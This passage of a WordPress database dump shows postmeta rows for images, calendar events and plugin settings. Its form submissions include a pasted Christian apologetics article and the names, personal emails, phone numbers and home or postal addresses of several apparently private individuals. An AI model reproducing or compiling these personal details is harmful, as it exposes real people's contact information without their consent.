rady'),(94085,261744,'_field_32','(727) 271-7602'),(94086,261744,'_field_33','laurajgrady@gmail.com'),(94087,261744,'_field_34','P. O. Box 330'),(94088,261744,'_field_35','Indian Hills'),(94599,259324,'passster_protection_type','password'),(94600,261517,'_wp_page_template','default'),(94601,261517,'passster_activate_protection',NULL),(94602,261517,'passster_protection_type','password'),(94603,261517,'boldgrid_hide_page_title','1'),(94604,261517,'boldgrid_in_page_containers','1'),(94605,261517,'bgseo_robots_index','index'),(94606,261517,'bgseo_robots_follow','follow'),(192818,269146,'mec_start_time_minutes','0'),(192817,269146,'mec_start_time_hour','10'),(94626,261839,'_wp_attached_file','2020/09/temple-cloud-bk-1.jpg'),(94622,261826,'original-file','2020/09/eck-temple-new-2020-3-updraft-pre-smush-original.jpg'),(94623,261826,'smush-complete','1'),(94624,261826,'smush-info','The file was compressed from 101.85 KB to 96.54 KB saving 5.21 percent using WP-Optimize'),(94625,261826,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:104294;s:12:\"smushed-size\";i:98859;s:15:\"savings-percent\";d:5.20999999999999996447286321199499070644378662109375;}'),(94620,261826,'_wp_attached_file','2020/09/eck-temple-new-2020-3.jpg'),(94621,261826,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:725;s:6:\"height\";i:342;s:4:\"file\";s:33:\"2020/09/eck-temple-new-2020-3.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"eck-temple-new-2020-3-300x142.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:142;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"eck-temple-new-2020-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"eck-temple-new-2020-3-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(94627,261839,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1079;s:4:\"file\";s:29:\"2020/09/temple-cloud-bk-1.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"temple-cloud-bk-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"temple-cloud-bk-1-1024x575.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:575;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"temple-cloud-bk-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"temple-cloud-bk-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:30:\"temple-cloud-bk-1-1536x863.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:863;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"temple-cloud-bk-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(94628,261839,'original-file','2020/09/temple-cloud-bk-1-updraft-pre-smush-original.jpg'),(94629,261839,'smush-complete','1'),(94630,261839,'smush-info','The file was compressed from 305.28 KB to 291.33 KB saving 4.57 percent using WP-Optimize'),(94631,261839,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:312611;s:12:\"smushed-size\";i:298321;s:15:\"savings-percent\";d:4.57000000000000028421709430404007434844970703125;}'),(94632,261841,'_field_133','Doug'),(94633,261841,'_field_134','Sanders'),(94634,261841,'_field_135','d.sanders@gmx.net'),(94635,261841,'_field_137','Twenty Reasons Christians  Believe Jesus is God'),(94636,261841,'_field_138','Twenty Reasons Christians \nBelieve Jesus is God\n\n \nby CHARLIE H. CAMPBELL\nDirector of The Always Be Ready Apologetics Ministry\n\n \nAuthor of Scrolls and Stones: Compelling Evidence\nthe Bible Can Be Trusted\n\n \nThe Bible, which we believe is trustworthy for a wealth of reasons, teaches that there is one God who eternally exists in three coequal persons: Father, Son and Holy Spirit. It teaches that Jesus (God the Son) came to the Earth 2,000 years ago to pay the penalty for mankind’s sin.  Many religious cults deny this, they teach that Jesus was, and is, merely a man, an angel, or one of many gods they say exist. Below are twenty reasons, taken right from Scripture, as to why Christians believe Jesus is Almighty God. \n\n1. The Apostle Thomas called Jesus \"God.\"\n\nJohn 20:27-29: Then He [Jesus] said to Thomas, “Reach your finger here, and look at My hands; and reach your hand here, and put it into My side. Do not be unbelieving, but believing.” And Thomas answered and said to Him, “My Lord and my God!” Jesus said to him, “Thomas, because you have seen Me, you have believed. Blessed are those who have not seen and yet have believed.”\n\n\n2. The Apostle Peter called Jesus \"God.\"\n\n2 Peter 1:1: “Simon Peter, a bond-servant and apostle of Jesus Christ, to those who have received a faith of the same kind as ours, by the righteousness of our God and Savior, Jesus Christ”\n\n\n3. The Apostle Paul called Jesus \"God.\"\n\nTitus 2:12b-14: “...we should live soberly, righteously, and godly in the present age, looking for the blessed hope and glorious appearing of our great God and Savior Jesus Christ, who gave Himself for us, that He might redeem us from every lawless deed and purify for Himself His own special people, zealous for good works.”\n\n\n4. The Apostle John called Jesus \"God.\"\n\nJohn 1:1-3, 14: “In the beginning was the Word, and the Word was with God, and the Word was God.” See verse 14 for confirmation that this reference to the \"Word\" is a reference to Jesus.\n\n\n5. God the Father called Jesus \"God.\"\n\nHebrews 1:8: “But to the Son He [God the Father] says: ‘Your throne, O God, is forever and ever; A scepter of righteousness is the scepter of Your Kingdom.’”\n\n\n6. Isaiah the Prophet said the Messiah would be God.\n\nIsaiah 9:6: “For unto us a Child is born, unto us a Son is given; and the government will be upon His shoulder. And His name will be called wonderful, Counselor, Mighty God, everlasting Father, Prince of Peace.”\n\nGod the Father, in the Old Testament, is also called “Mighty God” in Isaiah 10:21, the same title that can be ascribed to the Son of God, Jesus Christ.\n\n\n7. The Jews who crucified Jesus understood Him to be saying that He was equal with God.\n\nJohn 5:18: “Therefore the Jews sought all the more to kill Him, because He not only broke the Sabbath, but also said that God was His Father, making Himself equal with God.”\n\nJohn 10:33: “The Jews answered Him, saying, “For a good work we do not stone You, but for blasphemy, and because You, being a Man, make Yourself God.”\n\n\n8. Jesus called Himself “I AM”, the Old Testament name for God (Exodus 3:14).\n\nJohn 8:58-59: “Jesus said to them, “Most assuredly, I say to you, before Abraham was, I AM.” Then they took up stones to throw at Him; but Jesus hid Himself and went out of the temple, going through the midst of them, and so passed by.”\n\n\n9. Jesus calls Himself “the Alpha and Omega,” the title of Almighty God.\n\nRevelation 22:12-13: “Behold, I am coming quickly, and My reward is with Me, to render to every man according to what he has done. “I am the Alpha and the Omega, the first and the last, the beginning and the end.”\n\nRevelation 1:8: “I am the Alpha and the Omega,” says the Lord God, “who is and who was and who is to come, the Almighty.”\n\n\n10. Like God (Gen. 1:1), Jesus created.\n\nColossians 1:16-17: “For by Him [See context. This is speaking of Jesus] all things were created that are in heaven and that are on earth, visible and invisible, whether thrones or dominions or principalities or powers. All things were created through Him and for Him. And He is before all things, and in Him all things consist.”\nJohn 1:3: “All things were made through Him, and without Him nothing was made that was made.”\n\nYet God says in Isaiah 44:24, “I am the LORD, who makes all things, who stretches out the heavens all alone, who spreads abroad the earth by Myself”\n\n11. Like God, Jesus forgives sin.\n\nMark 2:5-7, 10-11: “When Jesus saw their faith, He said to the paralytic, “Son, your sins are forgiven you.” And some of the scribes were sitting there and reasoning in their hearts, Why does this Man speak blasphemies like this? Who can forgive sins but God alone?” “...But that you may know that the Son of Man has power on earth to forgive sins”--He said to the paralytic, “I say to you, arise, take up your bed, and go your way to your house.”\n\n\n12. Like God, Jesus gives eternal life.\n\nJohn 10:27-28: “My sheep hear My voice, and I know them, and they follow Me. And I give them eternal life, and they shall never perish; neither shall anyone snatch them out of My hand.”\n\n\n13. Like God, Jesus received, receives, and will receive worship.\n\nMatthew 14:32-33: “And when they got into the boat, the wind ceased. Then those who were in the boat came and worshiped Him, saying, “Truly You are the Son of God.” (also see Matthew 28:9, 17, John 9:37-38)\n\nRevelation 5:13: “And every creature which is in heaven and on the earth and under the earth and such as are in the sea, and all that are in them, I heard saying: “Blessing and honor and glory and power be to Him who sits on the throne, and to the Lamb, forever and ever!”\n\nHebrews 1:6: “But when He again brings the firstborn [JESUS] into the world, He says: “Let all the angels of God worship Him.”\n\nJesus never rebuked any of His followers for worshiping Him and yet worship of anything or anyone other than God is absolutely forbidden in the Bible . . .\nLuke 4:8: “And Jesus answered and said to him, “Get behind Me, Satan! For it is written, ‘You shall worship the Lord your God, and Him only you shall serve.’”\n\n\n14. Jesus said that only God was good; and Jesus was good.\n\nMark 10:17-18: “And as He was setting out on a journey, a man ran up to Him and knelt before Him, and began asking Him, “Good Teacher, what shall I do to inherit eternal life?” And Jesus said to him, “Why do you call Me good? No one is good except God alone.”\n\nJohn 10:11: “I am the good shepherd. The good shepherd gives His life for the sheep.”\nJesus was as good as they come. He was “sinless,” “holy,” “righteous,” “innocent,” “undefiled,” and “separate from sinners.” (Hebrews 7:26) That’s pretty good!\n\n\n15. Like God, Jesus can be present in more than one place at the same time.\n\nMatthew 18:20: “For where two or three are gathered together in My name, I am there in the midst of them.” (See also Matthew 28:20)\n\n\n16. One of Jesus’ titles is “God with us.”\n\nMatthew 1:23: “Behold, the virgin shall be with child, and bear a Son, and they shall call His name Immanuel,” which is translated, “God with us.”\n\n\n17. Jesus’ blood is called God’s blood.\n\nActs 20:28: “Therefore take heed to yourselves and to all the flock, among which the Holy Spirit has made you overseers, to shepherd the church of God which He purchased with His own blood.”\n\n\n18. Jesus has the same nature as God.\n\nHebrews 1:3a: “And He is the radiance of His glory and the exact representation of His nature, and upholds all things by the word of His power.”\n\n\n19. Jesus spoke as God.\n\nJesus did not speak as one of God’s prophets: “thus says the Lord,” but as God: “I say to you.”\nMatthew 5:27-29: “You have heard that it was said to those of old, ‘You shall not commit adultery.’ But I say to you that whoever looks at a woman to lust for her has already committed adultery with her in his heart.”\nJohn 14:15: “If you love Me, keep My commandments.”\nMatthew 7:28-29: “And so it was, when Jesus had ended these sayings, that the people were astonished at His teaching, for He taught them as one having authority, and not as the scribes.”\n\n\n20. Like God (Psalm 136:3), Jesus is called the \"Lord of Lords and King of kings.\"\n\nRevelation 17:14: “These will make war with the Lamb, and the Lamb will overcome them, for He is Lord of lords and King of kings; and those who are with Him are called, chosen, and faithful.” (See also 1 Timothy 6:15).\n\nIt is clear from these passages and dozens of others that Jesus was and is God almighty. Don\'t let a Religious Cult or any other person lead you astray. Be a noble minded Berean (Acts 17:11) and search the Scriptures to see for yourself that this is indeed the case.\n\n\nABOUT CHARLIE  H. CAMPBELL\n\nCharlie Campbell is the Director of the Always Be Ready Apologetics Ministry and a popular guest speaker at churches and conferences. He is the author of numerous articles, books, and DVDs, including:\n\n•  Scrolls &amp; Stones: Compelling Evidence the Bible Can Be Trusted\n•  Evidence for the Existence of God\n•  One Minute Answers to Skeptics\n•  Archaeological Evidence for the Bible \n•  The End Times: Ten Upcoming Events in Bible Prophecy\n•  The Case for the Resurrection \n•  Teaching and Preaching God\'s Word\n\nHis DVDs and books have been endorsed by Norman Geisler, Charles Colson, Chuck Smith, Ed Hindson, Nancy Leigh DeMoss, Jeremy Camp, and many others.\n\nEmail: info@AlwaysBeReady.com for further details.\n\n'),(94591,259733,'_wp_page_template','default'),(94592,259733,'passster_activate_protection',NULL),(94593,259733,'passster_protection_type','password'),(94594,259733,'boldgrid_hide_page_title','0'),(94595,259733,'boldgrid_in_page_containers','1'),(94596,259733,'bgseo_robots_index','index'),(94597,259733,'bgseo_robots_follow','follow'),(94598,259324,'passster_activate_protection',NULL),(96073,262151,'_seq_num','109'),(96072,262151,'_form_id','21'),(160553,266604,'mec_advanced_days','a:0:{}'),(160552,266604,'mec_repeat_end_at_date',''),(96949,262280,'_field_135','jbkbmz@gmail.com'),(96948,262280,'_field_134','davies'),(96947,262280,'_field_133','clayton'),(103425,225321,'_RTECmaxRegistrations','30'),(103461,225786,'protect_children',''),(103462,225786,'_RTECregistrationsDisabled','1'),(103463,225786,'_RTECdeadlineType','start'),(103464,225786,'_RTECwhoCanRegister','any'),(103465,225786,'_RTEClimitRegistrations','0'),(96850,262274,'_field_34','9047 Apache Plume Drive Unit C'),(96851,262274,'_field_35','Parker'),(96852,262274,'_field_36','CO'),(96853,262274,'_field_37','US'),(96854,262274,'_field_39','80134  (I don\'t see a field for zip code.)\n\nI emailed this information to Mike Mont-Eton but am not sure if he\'s still taking care of the database.  Thanks!'),(96855,262274,'_form_id','4'),(96856,262274,'_seq_num','9'),(160557,266604,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(96849,262274,'_field_33',''),(96848,262274,'_field_32','(720) 480-7454'),(96847,262274,'_field_31','Lafferty'),(96846,262274,'_field_30','Anna'),(73680,254622,'_wp_attachment_image_alt','HU -- The Sound of Soul'),(73647,254595,'_wp_attachment_image_alt','woman on edge of the ocean with rays of light beaming on her'),(73629,254583,'_wp_attached_file','2020/01/those-wonderful-eck-masters.jpg'),(73628,254582,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:147;s:6:\"height\";i:217;s:4:\"file\";s:27:\"2020/01/the-tigers-fang.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"the-tigers-fang-147x150.jpg\";s:5:\"width\";i:147;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:25:\"the-tigers-fang-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:27:\"the-tigers-fang-122x180.jpg\";s:5:\"width\";i:122;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:27:\"the-tigers-fang-147x150.jpg\";s:5:\"width\";i:147;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(126280,263372,'_EventEndDate','2021-07-04 12:00:00'),(126077,263364,'_EventCost',''),(126078,263364,'_EventURL',''),(126079,263364,'_EventTimezone','America/Denver'),(126080,263364,'_EventTimezoneAbbr','MST'),(126081,263364,'_dp_original','263362'),(126082,263364,'_edit_lock','1610660544:2'),(126083,263364,'_edit_last','2'),(128854,263459,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611754998;s:12:\"_EventOrigin\";i:1611754998;s:13:\"_thumbnail_id\";i:1611755387;s:24:\"boldgrid_hide_page_title\";i:1611754998;s:17:\"_EventShowMapLink\";i:1611754998;s:13:\"_EventShowMap\";i:1611754998;s:15:\"_EventStartDate\";i:1611755387;s:13:\"_EventEndDate\";i:1611755387;s:18:\"_EventStartDateUTC\";i:1611755387;s:16:\"_EventEndDateUTC\";i:1611755387;s:14:\"_EventDuration\";i:1611755387;s:20:\"_EventCurrencySymbol\";i:1611754998;s:22:\"_EventCurrencyPosition\";i:1611754998;s:10:\"_EventCost\";i:1611754998;s:9:\"_EventURL\";i:1611754998;s:14:\"_EventTimezone\";i:1611754998;s:18:\"_EventTimezoneAbbr\";i:1611754998;s:27:\"_EventNextPendingRecurrence\";i:1611754998;s:26:\"_RTECregistrationsDisabled\";i:1611754998;s:17:\"_RTECdeadlineType\";i:1611754998;s:19:\"_RTECwhoCanRegister\";i:1611754998;s:23:\"_RTEClimitRegistrations\";i:1611754998;s:21:\"_RTECmaxRegistrations\";i:1611754998;s:16:\"_EventRecurrence\";i:1611754998;s:18:\"_RTECnumRegistered\";i:1611754999;s:13:\"_EventVenueID\";i:1611754999;s:12:\"_dp_original\";i:1611754999;s:16:\"tribe_events_cat\";i:1611781382;s:10:\"_edit_last\";i:1611755021;s:12:\"post_content\";i:1611756114;s:10:\"post_title\";i:1611755097;s:11:\"post_status\";i:1611755387;}'),(128853,263459,'protect_children',''),(128851,263457,'_seq_num','119'),(128850,263457,'_form_id','21'),(128849,263457,'_field_229','a:1:{i:0;s:8:\"Loveland\";}'),(128848,263457,'_field_228','US'),(128847,263457,'_field_227','CO'),(128846,263457,'_field_226','lynnzies3@gmail.com'),(128845,263457,'_field_225','SUTTON'),(128844,263457,'_field_224','LYNNZIE'),(126131,263367,'protect_children',''),(141442,264894,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.1\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"02/06/2022\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(141443,264894,'mec_certain_weekdays','a:0:{}'),(141444,264894,'mec_allday','0'),(141445,264894,'one_occurrence','0'),(141446,264894,'mec_hide_time','0'),(141447,264894,'mec_hide_end_time','0'),(141448,264894,'mec_comment',''),(141449,264894,'mec_timezone','global'),(141450,264894,'mec_countdown_method','global'),(141451,264894,'mec_public','1'),(141452,264894,'mec_start_date','2021-06-06'),(141453,264894,'mec_start_time_hour','10'),(141454,264894,'mec_start_time_minutes','30'),(141455,264894,'mec_start_time_ampm','AM'),(126133,263367,'_EventOrigin','events-calendar'),(126134,263367,'protect_children',''),(141424,264894,'protect_children',''),(141425,264894,'protect_children',''),(141426,264894,'_edit_lock','1620592938:2'),(141427,264894,'_edit_last','2'),(141429,264894,'mec_color',''),(141430,264894,'mec_location_id','118'),(141431,264894,'mec_dont_show_map','0'),(141432,264894,'mec_organizer_id','1'),(141433,264894,'mec_read_more',''),(141434,264894,'mec_more_info',''),(141435,264894,'mec_more_info_title',''),(141436,264894,'mec_more_info_target','_self'),(141437,264894,'mec_cost',''),(141438,264894,'mec_currency','a:0:{}'),(141439,264894,'mec_additional_organizer_ids','a:0:{}'),(141440,264894,'mec_additional_location_ids','a:0:{}'),(141441,264894,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-06-06\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-06-06\";s:4:\"hour\";s:2:\"12\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.1\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"02/06/2022\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(126101,263366,'_EventStartDate','2021-02-07 10:30:00'),(126102,263366,'_EventStartDateUTC','2021-02-07 17:30:00'),(126103,263366,'_EventEndDate','2021-02-07 12:00:00'),(126279,263372,'_EventStartDateUTC','2021-07-04 16:30:00'),(126104,263366,'_EventEndDateUTC','2021-02-07 19:00:00'),(126105,263366,'_EventDuration','5400'),(128478,263366,'_EventOrigin','events-calendar'),(128497,263366,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:1:{i:263366;a:2:{s:9:\"timestamp\";i:1612693800;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:1;}'),(128488,263366,'_EventShowMapLink','1'),(128489,263366,'_EventShowMap','1'),(128490,263366,'_EventVenueID','262305'),(128491,263366,'_EventCurrencySymbol',''),(128492,263366,'_EventCurrencyPosition','prefix'),(128493,263366,'_EventCost',''),(128494,263366,'_EventURL',''),(128495,263366,'_EventTimezone','America/Denver'),(128496,263366,'_dp_original','263362'),(128483,263366,'_RTECwhoCanRegister','any'),(128484,263366,'_RTEClimitRegistrations','0'),(128485,263366,'_RTECmaxRegistrations','30'),(128486,263366,'boldgrid_hide_page_title','0'),(128487,263366,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-02-07\";s:14:\"EventStartDate\";s:19:\"2021-01-03 10:30:00\";s:12:\"EventEndDate\";s:19:\"2021-01-03 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(128479,263366,'_EventOrigin','events-calendar'),(128477,263366,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635235;s:12:\"_EventOrigin\";i:1610635235;s:13:\"_thumbnail_id\";i:1610635235;s:26:\"_RTECregistrationsDisabled\";i:1610635235;s:17:\"_RTECdeadlineType\";i:1610635235;s:19:\"_RTECwhoCanRegister\";i:1610635235;s:23:\"_RTEClimitRegistrations\";i:1610635235;s:21:\"_RTECmaxRegistrations\";i:1610635235;s:24:\"boldgrid_hide_page_title\";i:1610635235;s:16:\"_EventRecurrence\";i:1610635235;s:17:\"_EventShowMapLink\";i:1610635235;s:13:\"_EventShowMap\";i:1610635235;s:13:\"_EventVenueID\";i:1610635235;s:20:\"_EventCurrencySymbol\";i:1610635235;s:22:\"_EventCurrencyPosition\";i:1610635235;s:10:\"_EventCost\";i:1610635235;s:9:\"_EventURL\";i:1610635235;s:14:\"_EventTimezone\";i:1610635235;s:12:\"_dp_original\";i:1610635235;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635235;s:16:\"tribe_events_cat\";i:1610660435;}'),(128481,263366,'_RTECregistrationsDisabled','1'),(128482,263366,'_RTECdeadlineType','start'),(128474,263366,'protect_children',''),(128475,263366,'protect_children',''),(128476,263366,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635235;s:12:\"_EventOrigin\";i:1610635235;s:13:\"_thumbnail_id\";i:1610635235;s:26:\"_RTECregistrationsDisabled\";i:1610635235;s:17:\"_RTECdeadlineType\";i:1610635235;s:19:\"_RTECwhoCanRegister\";i:1610635235;s:23:\"_RTEClimitRegistrations\";i:1610635235;s:21:\"_RTECmaxRegistrations\";i:1610635235;s:24:\"boldgrid_hide_page_title\";i:1610635235;s:16:\"_EventRecurrence\";i:1610635235;s:17:\"_EventShowMapLink\";i:1610635235;s:13:\"_EventShowMap\";i:1610635235;s:13:\"_EventVenueID\";i:1610635235;s:20:\"_EventCurrencySymbol\";i:1610635235;s:22:\"_EventCurrencyPosition\";i:1610635235;s:10:\"_EventCost\";i:1610635235;s:9:\"_EventURL\";i:1610635235;s:14:\"_EventTimezone\";i:1610635235;s:12:\"_dp_original\";i:1610635235;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635235;s:16:\"tribe_events_cat\";i:1610660435;}'),(128473,263366,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635235;s:12:\"_EventOrigin\";i:1610635235;s:13:\"_thumbnail_id\";i:1610635235;s:26:\"_RTECregistrationsDisabled\";i:1610635235;s:17:\"_RTECdeadlineType\";i:1610635235;s:19:\"_RTECwhoCanRegister\";i:1610635235;s:23:\"_RTEClimitRegistrations\";i:1610635235;s:21:\"_RTECmaxRegistrations\";i:1610635235;s:24:\"boldgrid_hide_page_title\";i:1610635235;s:16:\"_EventRecurrence\";i:1610635235;s:17:\"_EventShowMapLink\";i:1610635235;s:13:\"_EventShowMap\";i:1610635235;s:13:\"_EventVenueID\";i:1610635235;s:20:\"_EventCurrencySymbol\";i:1610635235;s:22:\"_EventCurrencyPosition\";i:1610635235;s:10:\"_EventCost\";i:1610635235;s:9:\"_EventURL\";i:1610635235;s:14:\"_EventTimezone\";i:1610635235;s:12:\"_dp_original\";i:1610635235;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635235;s:16:\"tribe_events_cat\";i:1610660435;}'),(126138,263367,'_RTECregistrationsDisabled','1'),(126139,263367,'_RTECdeadlineType','start'),(126140,263367,'_RTECwhoCanRegister','any'),(126141,263367,'_RTEClimitRegistrations','0'),(126142,263367,'_RTECmaxRegistrations','30'),(126136,263367,'_EventOrigin','events-calendar'),(126143,263367,'boldgrid_hide_page_title','0'),(126144,263367,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2022-02-06\";s:14:\"EventStartDate\";s:19:\"2021-03-07 10:30:00\";s:12:\"EventEndDate\";s:19:\"2021-03-07 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(126145,263367,'_EventShowMapLink','1'),(126146,263367,'_EventShowMap','1'),(126147,263367,'_EventVenueID','262305'),(126148,263367,'_EventStartDate','2021-03-07 10:30:00'),(126149,263367,'_EventEndDate','2021-03-07 12:00:00'),(126150,263367,'_EventStartDateUTC','2021-03-07 17:30:00'),(126151,263367,'_EventEndDateUTC','2021-03-07 19:00:00'),(126152,263367,'_EventDuration','5400'),(126153,263367,'_EventCurrencySymbol',''),(126154,263367,'_EventCurrencyPosition','prefix'),(126155,263367,'_EventCost',''),(126156,263367,'_EventURL',''),(126157,263367,'_EventTimezone','America/Denver'),(126158,263367,'_EventTimezoneAbbr','MST'),(126159,263367,'_dp_original','263362'),(126160,263367,'_edit_lock','1620592969:2'),(126161,263367,'_edit_last','2'),(128843,263456,'_seq_num','118'),(128842,263456,'_form_id','21'),(128841,263456,'_field_229','a:1:{i:0;s:16:\"Colorado 